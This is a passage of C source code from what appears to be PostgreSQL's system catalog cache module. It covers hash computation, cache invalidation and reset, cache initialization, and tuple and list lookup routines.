case INT2VECTOROID: *hashfunc = hashint2vector; *eqfunc = F_INT2VECTOREQ; break; case INT4OID: *hashfunc = hashint4; *eqfunc = F_INT4EQ; break; case TEXTOID: *hashfunc = hashtext; *eqfunc = F_TEXTEQ; break; case OIDOID: case REGPROCOID: case REGPROCEDUREOID: case REGOPEROID: case REGOPERATOROID: case REGCLASSOID: case REGTYPEOID: case REGCONFIGOID: case REGDICTIONARYOID: *hashfunc = hashoid; *eqfunc = F_OIDEQ; break; case OIDVECTOROID: *hashfunc = hashoidvector; *eqfunc = F_OIDVECTOREQ; break; default: elog(FATAL, "type %u not supported as catcache key", keytype); *hashfunc = NULL; /* keep compiler quiet */ *eqfunc = InvalidOid; break; } } /* * CatalogCacheComputeHashValue * * Compute the hash value associated with a given set of lookup keys */ static uint32 CatalogCacheComputeHashValue(CatCache *cache, int nkeys, ScanKey cur_skey) { uint32 hashValue = 0; uint32 oneHash; CACHE4_elog(DEBUG2, "CatalogCacheComputeHashValue %s %d %p", cache->cc_relname, nkeys, cache); switch (nkeys) { case 4: oneHash = DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[3], cur_skey[3].sk_argument)); hashValue ^= oneHash << 24; hashValue ^= oneHash >> 8; /* FALLTHROUGH */ case 3: oneHash = DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[2], cur_skey[2].sk_argument)); hashValue ^= oneHash << 16; hashValue ^= oneHash >> 16; /* FALLTHROUGH */ case 2: oneHash = DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[1], cur_skey[1].sk_argument)); hashValue ^= oneHash << 8; hashValue ^= oneHash >> 24; /* FALLTHROUGH */ case 1: oneHash = DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[0], cur_skey[0].sk_argument)); hashValue ^= oneHash; break; default: elog(FATAL, "wrong number of hash keys: %d", nkeys); break; } return hashValue; } /* * CatalogCacheComputeTupleHashValue * * Compute the hash value associated with a given tuple to be cached */ static uint32 CatalogCacheComputeTupleHashValue(CatCache *cache, HeapTuple tuple) { ScanKeyData cur_skey[CATCACHE_MAXKEYS]; bool isNull = false; /* Copy pre-initialized overhead data for scankey */ memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey)); /* Now extract key fields from tuple, insert into scankey */ switch (cache->cc_nkeys) { case 4: cur_skey[3].sk_argument = (cache->cc_key[3] == ObjectIdAttributeNumber) ? ObjectIdGetDatum(HeapTupleGetOid(tuple)) : fastgetattr(tuple, cache->cc_key[3], cache->cc_tupdesc, &isNull); Assert(!isNull); /* FALLTHROUGH */ case 3: cur_skey[2].sk_argument = (cache->cc_key[2] == ObjectIdAttributeNumber) ? ObjectIdGetDatum(HeapTupleGetOid(tuple)) : fastgetattr(tuple, cache->cc_key[2], cache->cc_tupdesc, &isNull); Assert(!isNull); /* FALLTHROUGH */ case 2: cur_skey[1].sk_argument = (cache->cc_key[1] == ObjectIdAttributeNumber) ? ObjectIdGetDatum(HeapTupleGetOid(tuple)) : fastgetattr(tuple, cache->cc_key[1], cache->cc_tupdesc, &isNull); Assert(!isNull); /* FALLTHROUGH */ case 1: cur_skey[0].sk_argument = (cache->cc_key[0] == ObjectIdAttributeNumber) ? ObjectIdGetDatum(HeapTupleGetOid(tuple)) : fastgetattr(tuple, cache->cc_key[0], cache->cc_tupdesc, &isNull); Assert(!isNull); break; default: elog(FATAL, "wrong number of hash keys: %d", cache->cc_nkeys); break; } return CatalogCacheComputeHashValue(cache, cache->cc_nkeys, cur_skey); } #ifdef CATCACHE_STATS static void CatCachePrintStats(int code, Datum arg) { slist_iter iter; long cc_searches = 0; long cc_hits = 0; long cc_neg_hits = 0; long cc_newloads = 0; long cc_invals = 0; long cc_lsearches = 0; long cc_lhits = 0; slist_foreach(iter, &CacheHdr->ch_caches) { CatCache *cache = slist_container(CatCache, cc_next, iter.cur); if (cache->cc_ntup == 0 && cache->cc_searches == 0) continue; /* don't print unused caches */ elog(DEBUG2, "catcache %s/%u: %d tup, %ld srch, %ld+%ld=%ld hits, %ld+%ld=%ld loads, %ld invals, %ld lsrch, %ld lhits", cache->cc_relname, cache->cc_indexoid, cache->cc_ntup, cache->cc_searches, cache->cc_hits, cache->cc_neg_hits, cache->cc_hits + cache->cc_neg_hits, cache->cc_newloads, cache->cc_searches - cache->cc_hits - cache->cc_neg_hits - cache->cc_newloads, cache->cc_searches - cache->cc_hits - cache->cc_neg_hits, cache->cc_invals, cache->cc_lsearches, cache->cc_lhits); cc_searches += cache->cc_searches; cc_hits += cache->cc_hits; cc_neg_hits += cache->cc_neg_hits; cc_newloads += cache->cc_newloads; cc_invals += cache->cc_invals; cc_lsearches += cache->cc_lsearches; cc_lhits += cache->cc_lhits; } elog(DEBUG2, "catcache totals: %d tup, %ld srch, %ld+%ld=%ld hits, %ld+%ld=%ld loads, %ld invals, %ld lsrch, %ld lhits", CacheHdr->ch_ntup, cc_searches, cc_hits, cc_neg_hits, cc_hits + cc_neg_hits, cc_newloads, cc_searches - cc_hits - cc_neg_hits - cc_newloads, cc_searches - cc_hits - cc_neg_hits, cc_invals, cc_lsearches, cc_lhits); } #endif /* CATCACHE_STATS */ /* * CatCacheRemoveCTup * * Unlink and delete the given cache entry * * NB: if it is a member of a CatCList, the CatCList is deleted too. * Both the cache entry and the list had better have zero refcount. */ static void CatCacheRemoveCTup(CatCache *cache, CatCTup *ct) { Assert(ct->refcount == 0); Assert(ct->my_cache == cache); if (ct->c_list) { /* * The cleanest way to handle this is to call CatCacheRemoveCList, * which will recurse back to me, and the recursive call will do the * work. Set the "dead" flag to make sure it does recurse. */ ct->dead = true; CatCacheRemoveCList(cache, ct->c_list); return; /* nothing left to do */ } /* delink from linked list */ dlist_delete(&ct->cache_elem); /* free associated tuple data */ if (ct->tuple.t_data != NULL) pfree(ct->tuple.t_data); pfree(ct); --cache->cc_ntup; --CacheHdr->ch_ntup; } /* * CatCacheRemoveCList * * Unlink and delete the given cache list entry * * NB: any dead member entries that become unreferenced are deleted too. */ static void CatCacheRemoveCList(CatCache *cache, CatCList *cl) { int i; Assert(cl->refcount == 0); Assert(cl->my_cache == cache); /* delink from member tuples */ for (i = cl->n_members; --i >= 0;) { CatCTup *ct = cl->members[i]; Assert(ct->c_list == cl); ct->c_list = NULL; /* if the member is dead and now has no references, remove it */ if ( #ifndef CATCACHE_FORCE_RELEASE ct->dead && #endif ct->refcount == 0) CatCacheRemoveCTup(cache, ct); } /* delink from linked list */ dlist_delete(&cl->cache_elem); /* free associated tuple data */ if (cl->tuple.t_data != NULL) pfree(cl->tuple.t_data); pfree(cl); } /* * CatalogCacheIdInvalidate * * Invalidate entries in the specified cache, given a hash value. * * We delete cache entries that match the hash value, whether positive * or negative. We don't care whether the invalidation is the result * of a tuple insertion or a deletion. * * We used to try to match positive cache entries by TID, but that is * unsafe after a VACUUM FULL on a system catalog: an inval event could * be queued before VACUUM FULL, and then processed afterwards, when the * target tuple that has to be invalidated has a different TID than it * did when the event was created. So now we just compare hash values and * accept the small risk of unnecessary invalidations due to false matches. * * This routine is only quasi-public: it should only be used by inval.c. */ void CatalogCacheIdInvalidate(int cacheId, uint32 hashValue) { slist_iter cache_iter; CACHE1_elog(DEBUG2, "CatalogCacheIdInvalidate: called"); /* * inspect caches to find the proper cache */ slist_foreach(cache_iter, &CacheHdr->ch_caches) { CatCache *ccp = slist_container(CatCache, cc_next, cache_iter.cur); Index hashIndex; dlist_mutable_iter iter; if (cacheId != ccp->id) continue; /* * We don't bother to check whether the cache has finished * initialization yet; if not, there will be no entries in it so no * problem. */ /* * Invalidate *all* CatCLists in this cache; it's too hard to tell * which searches might still be correct, so just zap 'em all. */ dlist_foreach_modify(iter, &ccp->cc_lists) { CatCList *cl = dlist_container(CatCList, cache_elem, iter.cur); if (cl->refcount > 0) cl->dead = true; else CatCacheRemoveCList(ccp, cl); } /* * inspect the proper hash bucket for tuple matches */ hashIndex = HASH_INDEX(hashValue, ccp->cc_nbuckets); dlist_foreach_modify(iter, &ccp->cc_bucket[hashIndex]) { CatCTup *ct = dlist_container(CatCTup, cache_elem, iter.cur); if (hashValue == ct->hash_value) { if (ct->refcount > 0 || (ct->c_list && ct->c_list->refcount > 0)) { ct->dead = true; /* list, if any, was marked dead above */ Assert(ct->c_list == NULL || ct->c_list->dead); } else CatCacheRemoveCTup(ccp, ct); CACHE1_elog(DEBUG2, "CatalogCacheIdInvalidate: invalidated"); #ifdef CATCACHE_STATS ccp->cc_invals++; #endif /* could be multiple matches, so keep looking! */ } } break; /* need only search this one cache */ } } /* ---------------------------------------------------------------- * public functions * ---------------------------------------------------------------- */ /* * Standard routine for creating cache context if it doesn't exist yet * * There are a lot of places (probably far more than necessary) that check * whether CacheMemoryContext exists yet and want to create it if not. * We centralize knowledge of exactly how to create it here. */ void CreateCacheMemoryContext(void) { /* * Purely for paranoia, check that context doesn't exist; caller probably * did so already. */ if (!CacheMemoryContext) CacheMemoryContext = AllocSetContextCreate(TopMemoryContext, "CacheMemoryContext", ALLOCSET_DEFAULT_MINSIZE, ALLOCSET_DEFAULT_INITSIZE, ALLOCSET_DEFAULT_MAXSIZE); } /* * AtEOXact_CatCache * * Clean up catcaches at end of main transaction (either commit or abort) * * As of PostgreSQL 8.1, catcache pins should get released by the * ResourceOwner mechanism. This routine is just a debugging * cross-check that no pins remain. */ void AtEOXact_CatCache(bool isCommit) { #ifdef USE_ASSERT_CHECKING if (assert_enabled) { slist_iter cache_iter; slist_foreach(cache_iter, &CacheHdr->ch_caches) { CatCache *ccp = slist_container(CatCache, cc_next, cache_iter.cur); dlist_iter iter; int i; /* Check CatCLists */ dlist_foreach(iter, &ccp->cc_lists) { CatCList *cl = dlist_container(CatCList, cache_elem, iter.cur); Assert(cl->cl_magic == CL_MAGIC); Assert(cl->refcount == 0); Assert(!cl->dead); } /* Check individual tuples */ for (i = 0; i < ccp->cc_nbuckets; i++) { dlist_head *bucket = &ccp->cc_bucket[i]; dlist_foreach(iter, bucket) { CatCTup *ct = dlist_container(CatCTup, cache_elem, iter.cur); Assert(ct->ct_magic == CT_MAGIC); Assert(ct->refcount == 0); Assert(!ct->dead); } } } } #endif } /* * ResetCatalogCache * * Reset one catalog cache to empty. * * This is not very efficient if the target cache is nearly empty. * However, it shouldn't need to be efficient; we don't invoke it often. */ static void ResetCatalogCache(CatCache *cache) { dlist_mutable_iter iter; int i; /* Remove each list in this cache, or at least mark it dead */ dlist_foreach_modify(iter, &cache->cc_lists) { CatCList *cl = dlist_container(CatCList, cache_elem, iter.cur); if (cl->refcount > 0) cl->dead = true; else CatCacheRemoveCList(cache, cl); } /* Remove each tuple in this cache, or at least mark it dead */ for (i = 0; i < cache->cc_nbuckets; i++) { dlist_head *bucket = &cache->cc_bucket[i]; dlist_foreach_modify(iter, bucket) { CatCTup *ct = dlist_container(CatCTup, cache_elem, iter.cur); if (ct->refcount > 0 || (ct->c_list && ct->c_list->refcount > 0)) { ct->dead = true; /* list, if any, was marked dead above */ Assert(ct->c_list == NULL || ct->c_list->dead); } else CatCacheRemoveCTup(cache, ct); #ifdef CATCACHE_STATS cache->cc_invals++; #endif } } } /* * ResetCatalogCaches * * Reset all caches when a shared cache inval event forces it */ void ResetCatalogCaches(void) { slist_iter iter; CACHE1_elog(DEBUG2, "ResetCatalogCaches called"); slist_foreach(iter, &CacheHdr->ch_caches) { CatCache *cache = slist_container(CatCache, cc_next, iter.cur); ResetCatalogCache(cache); } CACHE1_elog(DEBUG2, "end of ResetCatalogCaches call"); } /* * CatalogCacheFlushCatalog * * Flush all catcache entries that came from the specified system catalog. * This is needed after VACUUM FULL/CLUSTER on the catalog, since the * tuples very likely now have different TIDs than before. (At one point * we also tried to force re-execution of CatalogCacheInitializeCache for * the cache(s) on that catalog. This is a bad idea since it leads to all * kinds of trouble if a cache flush occurs while loading cache entries. * We now avoid the need to do it by copying cc_tupdesc out of the relcache, * rather than relying on the relcache to keep a tupdesc for us. Of course * this assumes the tupdesc of a cachable system table will not change...) */ void CatalogCacheFlushCatalog(Oid catId) { slist_iter iter; CACHE2_elog(DEBUG2, "CatalogCacheFlushCatalog called for %u", catId); slist_foreach(iter, &CacheHdr->ch_caches) { CatCache *cache = slist_container(CatCache, cc_next, iter.cur); /* Does this cache store tuples of the target catalog? */ if (cache->cc_reloid == catId) { /* Yes, so flush all its contents */ ResetCatalogCache(cache); /* Tell inval.c to call syscache callbacks for this cache */ CallSyscacheCallbacks(cache->id, 0); } } CACHE1_elog(DEBUG2, "end of CatalogCacheFlushCatalog call"); } /* * InitCatCache * * This allocates and initializes a cache for a system catalog relation. * Actually, the cache is only partially initialized to avoid opening the * relation. The relation will be opened and the rest of the cache * structure initialized on the first access. */ #ifdef CACHEDEBUG #define InitCatCache_DEBUG2 \ do { \ elog(DEBUG2, "InitCatCache: rel=%u ind=%u id=%d nkeys=%d size=%d", \ cp->cc_reloid, cp->cc_indexoid, cp->id, \ cp->cc_nkeys, cp->cc_nbuckets); \ } while(0) #else #define InitCatCache_DEBUG2 #endif CatCache * InitCatCache(int id, Oid reloid, Oid indexoid, int nkeys, const int *key, int nbuckets) { CatCache *cp; MemoryContext oldcxt; int i; /* * nbuckets is the number of hash buckets to use in this catcache. * Currently we just use a hard-wired estimate of an appropriate size for * each cache; maybe later make them dynamically resizable? * * nbuckets must be a power of two. We check this via Assert rather than * a full runtime check because the values will be coming from constant * tables. * * If you're confused by the power-of-two check, see comments in * bitmapset.c for an explanation. */ Assert(nbuckets > 0 && (nbuckets & -nbuckets) == nbuckets); /* * first switch to the cache context so our allocations do not vanish at * the end of a transaction */ if (!CacheMemoryContext) CreateCacheMemoryContext(); oldcxt = MemoryContextSwitchTo(CacheMemoryContext); /* * if first time through, initialize the cache group header */ if (CacheHdr == NULL) { CacheHdr = (CatCacheHeader *) palloc(sizeof(CatCacheHeader)); slist_init(&CacheHdr->ch_caches); CacheHdr->ch_ntup = 0; #ifdef CATCACHE_STATS /* set up to dump stats at backend exit */ on_proc_exit(CatCachePrintStats, 0); #endif } /* * allocate a new cache structure * * Note: we rely on zeroing to initialize all the dlist headers correctly */ cp = (CatCache *) palloc0(sizeof(CatCache) + nbuckets * sizeof(dlist_head)); /* * initialize the cache's relation information for the relation * corresponding to this cache, and initialize some of the new cache's * other internal fields. But don't open the relation yet. */ cp->id = id; cp->cc_relname = "(not known yet)"; cp->cc_reloid = reloid; cp->cc_indexoid = indexoid; cp->cc_relisshared = false; /* temporary */ cp->cc_tupdesc = (TupleDesc) NULL; cp->cc_ntup = 0; cp->cc_nbuckets = nbuckets; cp->cc_nkeys = nkeys; for (i = 0; i < nkeys; ++i) cp->cc_key[i] = key[i]; /* * new cache is initialized as far as we can go for now. print some * debugging information, if appropriate. */ InitCatCache_DEBUG2; /* * add completed cache to top of group header's list */ slist_push_head(&CacheHdr->ch_caches, &cp->cc_next); /* * back to the old context before we return... */ MemoryContextSwitchTo(oldcxt); return cp; } /* * CatalogCacheInitializeCache * * This function does final initialization of a catcache: obtain the tuple * descriptor and set up the hash and equality function links. We assume * that the relcache entry can be opened at this point! */ #ifdef CACHEDEBUG #define CatalogCacheInitializeCache_DEBUG1 \ elog(DEBUG2, "CatalogCacheInitializeCache: cache @%p rel=%u", cache, \ cache->cc_reloid) #define CatalogCacheInitializeCache_DEBUG2 \ do { \ if (cache->cc_key[i] > 0) { \ elog(DEBUG2, "CatalogCacheInitializeCache: load %d/%d w/%d, %u", \ i+1, cache->cc_nkeys, cache->cc_key[i], \ tupdesc->attrs[cache->cc_key[i] - 1]->atttypid); \ } else { \ elog(DEBUG2, "CatalogCacheInitializeCache: load %d/%d w/%d", \ i+1, cache->cc_nkeys, cache->cc_key[i]); \ } \ } while(0) #else #define CatalogCacheInitializeCache_DEBUG1 #define CatalogCacheInitializeCache_DEBUG2 #endif static void CatalogCacheInitializeCache(CatCache *cache) { Relation relation; MemoryContext oldcxt; TupleDesc tupdesc; int i; CatalogCacheInitializeCache_DEBUG1; relation = heap_open(cache->cc_reloid, AccessShareLock); /* * switch to the cache context so our allocations do not vanish at the end * of a transaction */ Assert(CacheMemoryContext != NULL); oldcxt = MemoryContextSwitchTo(CacheMemoryContext); /* * copy the relcache's tuple descriptor to permanent cache storage */ tupdesc = CreateTupleDescCopyConstr(RelationGetDescr(relation)); /* * save the relation's name and relisshared flag, too (cc_relname is used * only for debugging purposes) */ cache->cc_relname = pstrdup(RelationGetRelationName(relation)); cache->cc_relisshared = RelationGetForm(relation)->relisshared; /* * return to the caller's memory context and close the rel */ MemoryContextSwitchTo(oldcxt); heap_close(relation, AccessShareLock); CACHE3_elog(DEBUG2, "CatalogCacheInitializeCache: %s, %d keys", cache->cc_relname, cache->cc_nkeys); /* * initialize cache's key information */ for (i = 0; i < cache->cc_nkeys; ++i) { Oid keytype; RegProcedure eqfunc; CatalogCacheInitializeCache_DEBUG2; if (cache->cc_key[i] > 0) keytype = tupdesc->attrs[cache->cc_key[i] - 1]->atttypid; else { if (cache->cc_key[i] != ObjectIdAttributeNumber) elog(FATAL, "only sys attr supported in caches is OID"); keytype = OIDOID; } GetCCHashEqFuncs(keytype, &cache->cc_hashfunc[i], &eqfunc); cache->cc_isname[i] = (keytype == NAMEOID); /* * Do equality-function lookup (we assume this won't need a catalog * lookup for any supported type) */ fmgr_info_cxt(eqfunc, &cache->cc_skey[i].sk_func, CacheMemoryContext); /* Initialize sk_attno suitably for HeapKeyTest() and heap scans */ cache->cc_skey[i].sk_attno = cache->cc_key[i]; /* Fill in sk_strategy as well --- always standard equality */ cache->cc_skey[i].sk_strategy = BTEqualStrategyNumber; cache->cc_skey[i].sk_subtype = InvalidOid; /* Currently, there are no catcaches on collation-aware data types */ cache->cc_skey[i].sk_collation = InvalidOid; CACHE4_elog(DEBUG2, "CatalogCacheInitializeCache %s %d %p", cache->cc_relname, i, cache); } /* * mark this cache fully initialized */ cache->cc_tupdesc = tupdesc; } /* * InitCatCachePhase2 -- external interface for CatalogCacheInitializeCache * * One reason to call this routine is to ensure that the relcache has * created entries for all the catalogs and indexes referenced by catcaches. * Therefore, provide an option to open the index as well as fixing the * cache itself. An exception is the indexes on pg_am, which we don't use * (cf. IndexScanOK). */ void InitCatCachePhase2(CatCache *cache, bool touch_index) { if (cache->cc_tupdesc == NULL) CatalogCacheInitializeCache(cache); if (touch_index && cache->id != AMOID && cache->id != AMNAME) { Relation idesc; /* * We must lock the underlying catalog before opening the index to * avoid deadlock, since index_open could possibly result in reading * this same catalog, and if anyone else is exclusive-locking this * catalog and index they'll be doing it in that order. */ LockRelationOid(cache->cc_reloid, AccessShareLock); idesc = index_open(cache->cc_indexoid, AccessShareLock); index_close(idesc, AccessShareLock); UnlockRelationOid(cache->cc_reloid, AccessShareLock); } } /* * IndexScanOK * * This function checks for tuples that will be fetched by * IndexSupportInitialize() during relcache initialization for * certain system indexes that support critical syscaches. * We can't use an indexscan to fetch these, else we'll get into * infinite recursion. A plain heap scan will work, however. * Once we have completed relcache initialization (signaled by * criticalRelcachesBuilt), we don't have to worry anymore. * * Similarly, during backend startup we have to be able to use the * pg_authid and pg_auth_members syscaches for authentication even if * we don't yet have relcache entries for those catalogs' indexes. */ static bool IndexScanOK(CatCache *cache, ScanKey cur_skey) { switch (cache->id) { case INDEXRELID: /* * Rather than tracking exactly which indexes have to be loaded * before we can use indexscans (which changes from time to time), * just force all pg_index searches to be heap scans until we've * built the critical relcaches. */ if (!criticalRelcachesBuilt) return false; break; case AMOID: case AMNAME: /* * Always do heap scans in pg_am, because it's so small there's * not much point in an indexscan anyway. We *must* do this when * initially building critical relcache entries, but we might as * well just always do it. */ return false; case AUTHNAME: case AUTHOID: case AUTHMEMMEMROLE: /* * Protect authentication lookups occurring before relcache has * collected entries for shared indexes. */ if (!criticalSharedRelcachesBuilt) return false; break; default: break; } /* Normal case, allow index scan */ return true; } /* * SearchCatCache * * This call searches a system cache for a tuple, opening the relation * if necessary (on the first access to a particular cache). * * The result is NULL if not found, or a pointer to a HeapTuple in * the cache. The caller must not modify the tuple, and must call * ReleaseCatCache() when done with it. * * The search key values should be expressed as Datums of the key columns' * datatype(s). (Pass zeroes for any unused parameters.) As a special * exception, the passed-in key for a NAME column can be just a C string; * the caller need not go to the trouble of converting it to a fully * null-padded NAME. */ HeapTuple SearchCatCache(CatCache *cache, Datum v1, Datum v2, Datum v3, Datum v4) { ScanKeyData cur_skey[CATCACHE_MAXKEYS]; uint32 hashValue; Index hashIndex; dlist_iter iter; dlist_head *bucket; CatCTup *ct; Relation relation; SysScanDesc scandesc; HeapTuple ntp; /* * one-time startup overhead for each cache */ if (cache->cc_tupdesc == NULL) CatalogCacheInitializeCache(cache); #ifdef CATCACHE_STATS cache->cc_searches++; #endif /* * initialize the search key information */ memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey)); cur_skey[0].sk_argument = v1; cur_skey[1].sk_argument = v2; cur_skey[2].sk_argument = v3; cur_skey[3].sk_argument = v4; /* * find the hash bucket in which to look for the tuple */ hashValue = CatalogCacheComputeHashValue(cache, cache->cc_nkeys, cur_skey); hashIndex = HASH_INDEX(hashValue, cache->cc_nbuckets); /* * scan the hash bucket until we find a match or exhaust our tuples * * Note: it's okay to use dlist_foreach here, even though we modify the * dlist within the loop, because we don't continue the loop afterwards. */ bucket = &cache->cc_bucket[hashIndex]; dlist_foreach(iter, bucket) { bool res; ct = dlist_container(CatCTup, cache_elem, iter.cur); if (ct->dead) continue; /* ignore dead entries */ if (ct->hash_value != hashValue) continue; /* quickly skip entry if wrong hash val */ /* * see if the cached tuple matches our key. */ HeapKeyTest(&ct->tuple, cache->cc_tupdesc, cache->cc_nkeys, cur_skey, res); if (!res) continue; /* * We found a match in the cache. Move it to the front of the list * for its hashbucket, in order to speed subsequent searches. (The * most frequently accessed elements in any hashbucket will tend to be * near the front of the hashbucket's list.) */ dlist_move_head(bucket, &ct->cache_elem); /* * If it's a positive entry, bump its refcount and return it. If it's * negative, we can report failure to the caller. */ if (!ct->negative) { ResourceOwnerEnlargeCatCacheRefs(CurrentResourceOwner); ct->refcount++; ResourceOwnerRememberCatCacheRef(CurrentResourceOwner, &ct->tuple); CACHE3_elog(DEBUG2, "SearchCatCache(%s): found in bucket %d", cache->cc_relname, hashIndex); #ifdef CATCACHE_STATS cache->cc_hits++; #endif return &ct->tuple; } else { CACHE3_elog(DEBUG2, "SearchCatCache(%s): found neg entry in bucket %d", cache->cc_relname, hashIndex); #ifdef CATCACHE_STATS cache->cc_neg_hits++; #endif return NULL; } } /* * Tuple was not found in cache, so we have to try to retrieve it directly * from the relation. If found, we will add it to the cache; if not * found, we will add a negative cache entry instead. * * NOTE: it is possible for recursive cache lookups to occur while reading * the relation --- for example, due to shared-cache-inval messages being * processed during heap_open(). This is OK. It's even possible for one * of those lookups to find and enter the very same tuple we are trying to * fetch here. If that happens, we will enter a second copy of the tuple * into the cache. The first copy will never be referenced again, and * will eventually age out of the cache, so there's no functional problem. * This case is rare enough that it's not worth expending extra cycles to * detect. */ relation = heap_open(cache->cc_reloid, AccessShareLock); scandesc = systable_beginscan(relation, cache->cc_indexoid, IndexScanOK(cache, cur_skey), SnapshotNow, cache->cc_nkeys, cur_skey); ct = NULL; while (HeapTupleIsValid(ntp = systable_getnext(scandesc))) { ct = CatalogCacheCreateEntry(cache, ntp, hashValue, hashIndex, false); /* immediately set the refcount to 1 */ ResourceOwnerEnlargeCatCacheRefs(CurrentResourceOwner); ct->refcount++; ResourceOwnerRememberCatCacheRef(CurrentResourceOwner, &ct->tuple); break; /* assume only one match */ } systable_endscan(scandesc); heap_close(relation, AccessShareLock); /* * If tuple was not found, we need to build a negative cache entry * containing a fake tuple. The fake tuple has the correct key columns, * but nulls everywhere else. * * In bootstrap mode, we don't build negative entries, because the cache * invalidation mechanism isn't alive and can't clear them if the tuple * gets created later. (Bootstrap doesn't do UPDATEs, so it doesn't need * cache inval for that.) */ if (ct == NULL) { if (IsBootstrapProcessingMode()) return NULL; ntp = build_dummy_tuple(cache, cache->cc_nkeys, cur_skey); ct = CatalogCacheCreateEntry(cache, ntp, hashValue, hashIndex, true); heap_freetuple(ntp); CACHE4_elog(DEBUG2, "SearchCatCache(%s): Contains %d/%d tuples", cache->cc_relname, cache->cc_ntup, CacheHdr->ch_ntup); CACHE3_elog(DEBUG2, "SearchCatCache(%s): put neg entry in bucket %d", cache->cc_relname, hashIndex); /* * We are not returning the negative entry to the caller, so leave its * refcount zero. */ return NULL; } CACHE4_elog(DEBUG2, "SearchCatCache(%s): Contains %d/%d tuples", cache->cc_relname, cache->cc_ntup, CacheHdr->ch_ntup); CACHE3_elog(DEBUG2, "SearchCatCache(%s): put in bucket %d", cache->cc_relname, hashIndex); #ifdef CATCACHE_STATS cache->cc_newloads++; #endif return &ct->tuple; } /* * ReleaseCatCache * * Decrement the reference count of a catcache entry (releasing the * hold grabbed by a successful SearchCatCache). * * NOTE: if compiled with -DCATCACHE_FORCE_RELEASE then catcache entries * will be freed as soon as their refcount goes to zero. In combination * with aset.c's CLOBBER_FREED_MEMORY option, this provides a good test * to catch references to already-released catcache entries. */ void ReleaseCatCache(HeapTuple tuple) { CatCTup *ct = (CatCTup *) (((char *) tuple) - offsetof(CatCTup, tuple)); /* Safety checks to ensure we were handed a cache entry */ Assert(ct->ct_magic == CT_MAGIC); Assert(ct->refcount > 0); ct->refcount--; ResourceOwnerForgetCatCacheRef(CurrentResourceOwner, &ct->tuple); if ( #ifndef CATCACHE_FORCE_RELEASE ct->dead && #endif ct->refcount == 0 && (ct->c_list == NULL || ct->c_list->refcount == 0)) CatCacheRemoveCTup(ct->my_cache, ct); } /* * GetCatCacheHashValue * * Compute the hash value for a given set of search keys. * * The reason for exposing this as part of the API is that the hash value is * exposed in cache invalidation operations, so there are places outside the * catcache code that need to be able to compute the hash values. */ uint32 GetCatCacheHashValue(CatCache *cache, Datum v1, Datum v2, Datum v3, Datum v4) { ScanKeyData cur_skey[CATCACHE_MAXKEYS]; /* * one-time startup overhead for each cache */ if (cache->cc_tupdesc == NULL) CatalogCacheInitializeCache(cache); /* * initialize the search key information */ memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey)); cur_skey[0].sk_argument = v1; cur_skey[1].sk_argument = v2; cur_skey[2].sk_argument = v3; cur_skey[3].sk_argument = v4; /* * calculate the hash value */ return CatalogCacheComputeHashValue(cache, cache->cc_nkeys, cur_skey); } /* * SearchCatCacheList * * Generate a list of all tuples matching a partial key (that is, * a key specifying just the first K of the cache's N key columns). * * The caller must not modify the list object or the pointed-to tuples, * and must call ReleaseCatCacheList() when done with the list. */ CatCList * SearchCatCacheList(CatCache *cache, int nkeys, Datum v1, Datum v2, Datum v3, Datum v4) { ScanKeyData cur_skey[CATCACHE_MAXKEYS]; uint32 lHashValue; dlist_iter iter; CatCList *cl; CatCTup *ct; List *volatile ctlist; ListCell *ctlist_item; int nmembers; bool ordered; HeapTuple ntp; MemoryContext oldcxt; int i; /* * one-time startup overhead for each cache */ if (cache->cc_tupdesc == NULL) CatalogCacheInitializeCache(cache); Assert(nkeys > 0 && nkeys < cache->cc_nkeys); #ifdef CATCACHE_STATS cache->cc_lsearches++; #endif /* * initialize the search key information */ memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey)); cur_skey[0].sk_argument = v1; cur_skey[1].sk_argument = v2; cur_skey[2].sk_argument = v3; cur_skey[3].sk_argument = v4; /* * compute a hash value of the given keys for faster search. We don't * presently divide the CatCList items into buckets, but this still lets * us skip non-matching items quickly most of the time. */ lHashValue = CatalogCacheComputeHashValue(cache, nkeys, cur_skey); /* * scan the items until we find a match or exhaust our list * * Note: it's okay to use dlist_foreach here, even though we modify the * dlist within the loop, because we don't continue the loop afterwards. */ dlist_foreach(iter, &cache->cc_lists) { bool res; cl = dlist_container(CatCList, cache_elem, iter.cur); if (cl->dead) continue; /* ignore dead entries */ if (cl->hash_value != lHashValue) continue; /* quickly skip entry if wrong hash val */ /* * see if the cached list matches our key. */ if (cl->nkeys != nkeys) continue; HeapKeyTest(&cl->tuple, cache->cc_tupdesc, nkeys, cur_skey, res); if (!res) continue; /* * We found a matching list. Move the list to the front of the * cache's list-of-lists, to speed subsequent searches. (We do not * move the members to the fronts of their hashbucket lists, however, * since there's no point in that unless they are searched for * individually.) */ dlist_move_head(&cache->cc_lists, &cl->cache_elem); /* Bump the list's refcount and return it */ ResourceOwnerEnlargeCatCacheListRefs(CurrentResourceOwner); cl->refcount++; ResourceOwnerRememberCatCacheListRef(CurrentResourceOwner, cl); CACHE2_elog(DEBUG2, "SearchCatCacheList(%s): found list", cache->cc_relname); #ifdef CATCACHE_STATS cache->cc_lhits++; #endif return cl; } /* * List was not found in cache, so we have to build it by reading the * relation. For each matching tuple found in the relation, use an * existing cache entry if possible, else build a new one. * * We have to bump the member refcounts temporarily to ensure they won't * get dropped from the cache while loading other members. We use a PG_TRY * block to ensure we can undo those refcounts if we get an error before * we finish constructing the CatCList. */ ResourceOwnerEnlargeCatCacheListRefs(CurrentResourceOwner); ctlist = NIL; PG_TRY(); { Relation relation; SysScanDesc scandesc; relation = heap_open(cache->cc_reloid, AccessShareLock); scandesc = systable_beginscan(relation, cache->cc_indexoid, IndexScanOK(cache, cur_skey), SnapshotNow, nkeys, cur_skey); /* The list will be ordered iff we are doing an index scan */ ordered = (scandesc->irel != NULL); while (HeapTupleIsValid(ntp = systable_getnext(scandesc))) { uint32 hashValue; Index hashIndex; bool found = false; dlist_head *bucket; /* * See if there's an entry for this tuple already. */ ct = NULL; hashValue = CatalogCacheComputeTupleHashValue(cache, ntp); hashIndex = HASH_INDEX(hashValue, cache->cc_nbuckets); bucket = &cache->cc_bucket[hashIndex]; dlist_foreach(iter, bucket) { ct = dlist_container(CatCTup, cache_elem, 